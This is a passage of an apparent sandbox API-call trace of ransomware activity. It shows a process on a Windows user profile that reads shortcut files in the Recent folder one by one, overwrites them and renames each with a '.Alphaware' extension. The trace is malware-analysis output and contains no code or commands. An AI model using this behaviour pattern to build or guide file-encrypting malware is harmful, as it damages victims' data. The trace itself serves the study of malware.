"c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\grd5c_7rsx_r-az.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\grD5c_7rsX_r-Az.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\grd5c_7rsx_r-az.lnk.alphaware")) returned 1 [0096.543] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gV-dKx26kEi.pdf.lnk", dwFileAttributes=0x80) returned 1 [0096.543] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gV-dKx26kEi.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gv-dkx26kei.pdf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24c7aa8 | out: lpFileInformation=0x24c7aa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0caca60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0caca60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0caca60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3c0)) returned 1 [0096.543] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gV-dKx26kEi.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gv-dkx26kei.pdf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.544] ReadFile (in: hFile=0x250, lpBuffer=0x24c8140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24c8140*, lpNumberOfBytesRead=0x23e958*=0x3c0, lpOverlapped=0x0) returned 1 [0096.565] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gV-dKx26kEi.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gv-dkx26kei.pdf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.568] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gV-dKx26kEi.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gv-dkx26kei.pdf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0caca60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0caca60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bc2c080, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5e0)) returned 1 [0096.570] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gV-dKx26kEi.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gv-dkx26kei.pdf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gV-dKx26kEi.pdf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gv-dkx26kei.pdf.lnk.alphaware")) returned 1 [0096.571] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GwoFAC.pdf.lnk", dwFileAttributes=0x80) returned 1 [0096.571] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GwoFAC.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gwofac.pdf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25495e0 | out: lpFileInformation=0x25495e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd160c100, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd160c100, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd160c100, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x98f)) returned 1 [0096.572] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GwoFAC.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gwofac.pdf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.572] ReadFile (in: hFile=0x250, lpBuffer=0x254a228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x254a228*, lpNumberOfBytesRead=0x23e958*=0x98f, lpOverlapped=0x0) returned 1 [0096.622] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GwoFAC.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gwofac.pdf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.624] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GwoFAC.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gwofac.pdf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd160c100, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd160c100, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bc9e4a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd88)) returned 1 [0096.625] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GwoFAC.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gwofac.pdf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GwoFAC.pdf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gwofac.pdf.lnk.alphaware")) returned 1 [0096.626] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Gym-mdc1iNSfM4mpMZh.swf.lnk", dwFileAttributes=0x80) returned 1 [0096.626] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Gym-mdc1iNSfM4mpMZh.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gym-mdc1insfm4mpmzh.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25cf228 | out: lpFileInformation=0x25cf228*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd103eb60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd103eb60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd103eb60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe3c)) returned 1 [0096.626] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Gym-mdc1iNSfM4mpMZh.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gym-mdc1insfm4mpmzh.swf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.626] ReadFile (in: hFile=0x250, lpBuffer=0x25d0398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25d0398*, lpNumberOfBytesRead=0x23e958*=0xe3c, lpOverlapped=0x0) returned 1 [0096.648] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Gym-mdc1iNSfM4mpMZh.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gym-mdc1insfm4mpmzh.swf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.651] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Gym-mdc1iNSfM4mpMZh.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gym-mdc1insfm4mpmzh.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd103eb60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd103eb60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bcea760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13c8)) returned 1 [0096.651] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Gym-mdc1iNSfM4mpMZh.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gym-mdc1insfm4mpmzh.swf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Gym-mdc1iNSfM4mpMZh.swf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\gym-mdc1insfm4mpmzh.swf.lnk.alphaware")) returned 1 [0096.652] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H-iXHNw3Q.lnk", dwFileAttributes=0x80) returned 1 [0096.653] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H-iXHNw3Q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\h-ixhnw3q.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2458908 | out: lpFileInformation=0x2458908*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd1253ea0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1253ea0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1253ea0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x185d)) returned 1 [0096.653] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H-iXHNw3Q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\h-ixhnw3q.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.653] ReadFile (in: hFile=0x250, lpBuffer=0x2458ba8, nNumberOfBytesToRead=0x185d, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2458ba8*, lpNumberOfBytesRead=0x23e958*=0x185d, lpOverlapped=0x0) returned 1 [0096.672] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H-iXHNw3Q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\h-ixhnw3q.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.674] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H-iXHNw3Q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\h-ixhnw3q.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1253ea0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1253ea0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bd108c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2148)) returned 1 [0096.674] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H-iXHNw3Q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\h-ixhnw3q.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H-iXHNw3Q.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\h-ixhnw3q.lnk.alphaware")) returned 1 [0096.675] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H8WEhqDt-nLLYwL7w3.lnk", dwFileAttributes=0x80) returned 1 [0096.675] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H8WEhqDt-nLLYwL7w3.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\h8wehqdt-nllywl7w3.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24e8410 | out: lpFileInformation=0x24e8410*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd16ca7e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16ca7e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd16ca7e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xf47)) returned 1 [0096.676] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H8WEhqDt-nLLYwL7w3.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\h8wehqdt-nllywl7w3.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.676] ReadFile (in: hFile=0x250, lpBuffer=0x24e9668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24e9668*, lpNumberOfBytesRead=0x23e958*=0xf47, lpOverlapped=0x0) returned 1 [0096.695] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H8WEhqDt-nLLYwL7w3.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\h8wehqdt-nllywl7w3.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.698] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H8WEhqDt-nLLYwL7w3.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\h8wehqdt-nllywl7w3.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd16ca7e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16ca7e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bd5cb80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1534)) returned 1 [0096.698] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H8WEhqDt-nLLYwL7w3.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\h8wehqdt-nllywl7w3.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H8WEhqDt-nLLYwL7w3.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\h8wehqdt-nllywl7w3.lnk.alphaware")) returned 1 [0096.700] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hoG8.lnk", dwFileAttributes=0x80) returned 1 [0096.700] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hoG8.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\hog8.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2572228 | out: lpFileInformation=0x2572228*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd11bb920, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11bb920, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd11bb920, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x97c)) returned 1 [0096.700] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hoG8.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\hog8.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.701] ReadFile (in: hFile=0x250, lpBuffer=0x2572e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2572e58*, lpNumberOfBytesRead=0x23e958*=0x97c, lpOverlapped=0x0) returned 1 [0096.722] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hoG8.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\hog8.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.724] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hoG8.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\hog8.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11bb920, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11bb920, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bda8e40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd74)) returned 1 [0096.724] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hoG8.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\hog8.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hoG8.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\hog8.lnk.alphaware")) returned 1 [0096.725] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hTjop.lnk", dwFileAttributes=0x80) returned 1 [0096.725] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hTjop.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\htjop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23f82e8 | out: lpFileInformation=0x23f82e8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfbdcf00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfbdcf00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfbdcf00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x983)) returned 1 [0096.725] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hTjop.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\htjop.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.726] ReadFile (in: hFile=0x250, lpBuffer=0x23f8f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f8f20*, lpNumberOfBytesRead=0x23e958*=0x983, lpOverlapped=0x0) returned 1 [0096.744] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hTjop.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\htjop.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.746] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hTjop.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\htjop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfbdcf00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfbdcf00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bdcefa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd88)) returned 1 [0096.746] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hTjop.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\htjop.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hTjop.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\htjop.lnk.alphaware")) returned 1 [0096.747] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hWvMFQJJJ.lnk", dwFileAttributes=0x80) returned 1 [0096.747] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hWvMFQJJJ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\hwvmfqjjj.lnk"), fInfoLevelId=0x0, lpFileInformation=0x247e5a0 | out: lpFileInformation=0x247e5a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce5fe4e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1716aa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1716aa0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x900)) returned 1 [0096.747] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hWvMFQJJJ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\hwvmfqjjj.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.747] ReadFile (in: hFile=0x250, lpBuffer=0x247f170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x247f170*, lpNumberOfBytesRead=0x23e958*=0x900, lpOverlapped=0x0) returned 1 [0096.765] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hWvMFQJJJ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\hwvmfqjjj.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.767] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hWvMFQJJJ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\hwvmfqjjj.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce5fe4e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1716aa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bdf5100, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xce0)) returned 1 [0096.767] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hWvMFQJJJ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\hwvmfqjjj.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hWvMFQJJJ.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\hwvmfqjjj.lnk.alphaware")) returned 1 [0096.768] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IaDqH9.lnk", dwFileAttributes=0x80) returned 1 [0096.768] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IaDqH9.lnk" (normalized: 